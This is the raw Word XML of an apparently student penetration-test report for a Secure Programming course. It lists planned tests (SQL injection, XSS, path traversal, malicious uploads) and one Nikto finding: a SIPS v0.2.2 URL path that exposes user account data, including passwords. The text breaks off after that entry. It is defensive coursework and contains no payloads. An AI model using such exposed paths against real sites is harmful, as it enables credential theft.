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26587460"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="00954A2E" w:rsidRDefault="00954A2E">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group w14:anchorId="0A1E86E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54A2E" w:rsidRDefault="00954A2E">
                                    <w:pPr>
                                      <w:pStyle w:val="NoSpacing"/>
                                      <w:jc w:val="right"/>
                                      <w:rPr>
                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r>
                                      <w:rPr>
                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                      <w:t>Radu Alexandru, Raditya Surya Pratama, Georgiana Manolache, Armin Roushan, Jan-Niklas Schneider, Nina O’Driscoll.</w:t>
                                    </w:r>
                                  </w:p>
                                </w:sdtContent>
                              </w:sdt>
                              <w:p w:rsidR="00954A2E" w:rsidRDefault="00954A2E">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954A2E" w:rsidRDefault="00954A2E">
                              <w:pPr>
                                <w:pStyle w:val="NoSpacing"/>
                                <w:jc w:val="right"/>
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                              </w:pPr>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t>Radu</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t>Alexandru</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t xml:space="preserve">, </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t>Raditya</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> Surya </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t>Pratama</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t xml:space="preserve">, Georgiana Manolache, Armin </w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t>Roushan</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t>, Jan-Niklas Schneider, Nina O’Driscoll.</w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                        <w:p w:rsidR="00954A2E" w:rsidRDefault="00954A2E">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954A2E" w:rsidRDefault="00AF00F4">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954A2E" w:rsidRDefault="00AF00F4">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54A2E" w:rsidRDefault="00F4176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54A2E">
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="5B9BD5" w:themeColor="accent1"/>
                                        <w:sz w:val="64"/>
                                        <w:szCs w:val="64"/>
                                      </w:rPr>
                                      <w:t>Pentest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54A2E" w:rsidRDefault="00D16E64">
                                    <w:pPr>
                                      <w:jc w:val="right"/>
                                      <w:rPr>
                                        <w:smallCaps/>
                                        <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                                        <w:sz w:val="36"/>
                                        <w:szCs w:val="36"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r>
                                      <w:rPr>
                                        <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                                        <w:sz w:val="36"/>
                                        <w:szCs w:val="36"/>
                                      </w:rPr>
                                      <w:t>Secure Programming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954A2E" w:rsidRDefault="00FC0A3D">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54A2E">
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="5B9BD5" w:themeColor="accent1"/>
                                  <w:sz w:val="64"/>
                                  <w:szCs w:val="64"/>
                                </w:rPr>
                                <w:t>Pentest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954A2E" w:rsidRDefault="00D16E64">
                              <w:pPr>
                                <w:jc w:val="right"/>
                                <w:rPr>
                                  <w:smallCaps/>
                                  <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                                <w:t>Secure Programming</w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap type="square" anchorx="page" anchory="page"/>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
        </w:p>
        <w:p w:rsidR="00954A2E" w:rsidRDefault="00954A2E">
          <w:pPr>
            <w:spacing w:line="259" w:lineRule="auto"/>
            <w:rPr>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:color w:val="FFFFFF" w:themeColor="background1"/>
            </w:rPr>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="-1703703936"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="00954A2E" w:rsidRDefault="00954A2E" w:rsidP="00437351">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="0"/>
            </w:numPr>
            <w:ind w:left="432" w:hanging="432"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00437351" w:rsidRDefault="00954A2E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc464415748" w:history="1">
            <w:r w:rsidR="00437351" w:rsidRPr="00D52F4A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00437351" w:rsidRPr="00D52F4A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Goals</w:t>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc464415748 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00437351" w:rsidRDefault="00F4176E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc464415749" w:history="1">
            <w:r w:rsidR="00437351" w:rsidRPr="00D52F4A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00437351" w:rsidRPr="00D52F4A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Result Analysis</w:t>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc464415749 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00437351" w:rsidRDefault="00F4176E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc464415750" w:history="1">
            <w:r w:rsidR="00437351" w:rsidRPr="00D52F4A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00437351" w:rsidRPr="00D52F4A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Changes on the server</w:t>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc464415750 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00437351" w:rsidRDefault="00F4176E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc464415751" w:history="1">
            <w:r w:rsidR="00437351" w:rsidRPr="00D52F4A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00437351" w:rsidRPr="00D52F4A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Other screenshots from the analysis</w:t>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc464415751 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00437351" w:rsidRDefault="00F4176E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc464415752" w:history="1">
            <w:r w:rsidR="00437351" w:rsidRPr="00D52F4A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Conclusion</w:t>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc464415752 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00437351">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="004A0514" w:rsidRDefault="00954A2E" w:rsidP="004A0514">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>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Default="004A0514" w:rsidP="004A0514"/>
    <w:p w:rsidR="004A0514" w:rsidRPr="004A0514" w:rsidRDefault="004A0514" w:rsidP="004A0514"/>
    <w:p w:rsidR="00797675" w:rsidRDefault="00797675">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00283D01" w:rsidRDefault="00283D01" w:rsidP="00786B0A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc464415748"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00283D01" w:rsidRPr="00283D01" w:rsidRDefault="00283D01" w:rsidP="00283D01">
      <w:r>
        <w:t>The goal of this document is</w:t>
      </w:r>
      <w:r w:rsidR="00A2508C">
        <w:t xml:space="preserve"> an overview of the performed pen testing on the web site cloud service. </w:t>
      </w:r>
      <w:r w:rsidR="00E41572">
        <w:t xml:space="preserve">The document is structured </w:t>
      </w:r>
      <w:r w:rsidR="00A6284F">
        <w:t>into</w:t>
      </w:r>
      <w:r w:rsidR="00793505">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A6284F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00793505">
        <w:t xml:space="preserve">initially, </w:t>
      </w:r>
      <w:r w:rsidR="00A6284F">
        <w:t>describing goals that are desired in the pen test</w:t>
      </w:r>
      <w:r w:rsidR="00793505">
        <w:t>, following</w:t>
      </w:r>
      <w:r w:rsidR="00A6284F">
        <w:t xml:space="preserve"> its results.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E" w:rsidP="00786B0A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00134638">
        <w:t>Goals</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E" w:rsidP="00D92A2E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The goal of the penetration test is to perform attacks upon the web application and to expose </w:t>
      </w:r>
      <w:r w:rsidR="00AF00F4">
        <w:t>its</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E" w:rsidP="00D92A2E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>We will start off by gathering information (e.g. through port scans and DNS discoveries) and using that to perform the following tests:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E" w:rsidP="00D92A2E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The following are tests we will perform against our opponent’s website:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E" w:rsidP="00D92A2E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E" w:rsidP="00D92A2E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL Injection Vulnerabilities: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E" w:rsidP="00D92A2E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We will test for input vulnerabilities </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E" w:rsidP="00D92A2E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>URL parameters – include malicious JavaScript or SQL statements in the URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E" w:rsidP="00D92A2E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Cross Site Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E" w:rsidP="00D92A2E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>We will use input vulnerabilities to embed SQL scripts or JavaScript that will execute unauthorized code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E" w:rsidP="00D92A2E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Path Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E" w:rsidP="00D92A2E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>We will try and find files by navigating the file structure of the website.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C36DD6" w:rsidRPr="00F67065" w:rsidRDefault="00D92A2E" w:rsidP="00F67065">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Upload malicious files into the cloud serv</w:t>
      </w:r>
      <w:r w:rsidR="000109CF">
        <w:t>ic</w:t>
      </w:r>
      <w:r>
        <w:t>e.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C36DD6" w:rsidRPr="00C36DD6" w:rsidRDefault="00C36DD6" w:rsidP="00C36DD6"/>
    <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E" w:rsidP="00437351">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc464415749"/>
      <w:r>
        <w:t xml:space="preserve">Result </w:t>
      </w:r>
      <w:r w:rsidRPr="00E455D7">
        <w:t>Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E" w:rsidP="00D92A2E">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D92A2E" w:rsidTr="00D92A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D92A2E" w:rsidRDefault="00D92A2E">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r>
              <w:t>Vulnerability ID:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="8EAADB" w:themeColor="accent5" w:themeTint="99"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Path Traversal</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Path Traversal</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r>
              <w:t>3</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Prevent server side information from being displayed</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r>
              <w:t>Vulnerability found using Nikto software: /SePrWebsite/index.php/sips/sipssys/users/a/admin/user: SIPS v0.2.2 allows user account info (including password) to be retrieved remotely.</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Use routing and update the SIPS.</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D92A2E" w:rsidRDefault="00D92A2E">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p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D92A2E" w:rsidRDefault="00D92A2E" w:rsidP="00D92A2E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B252C" w:rsidRDefault="004D6EE7" w:rsidP="000B252C">
      <w:pPr>
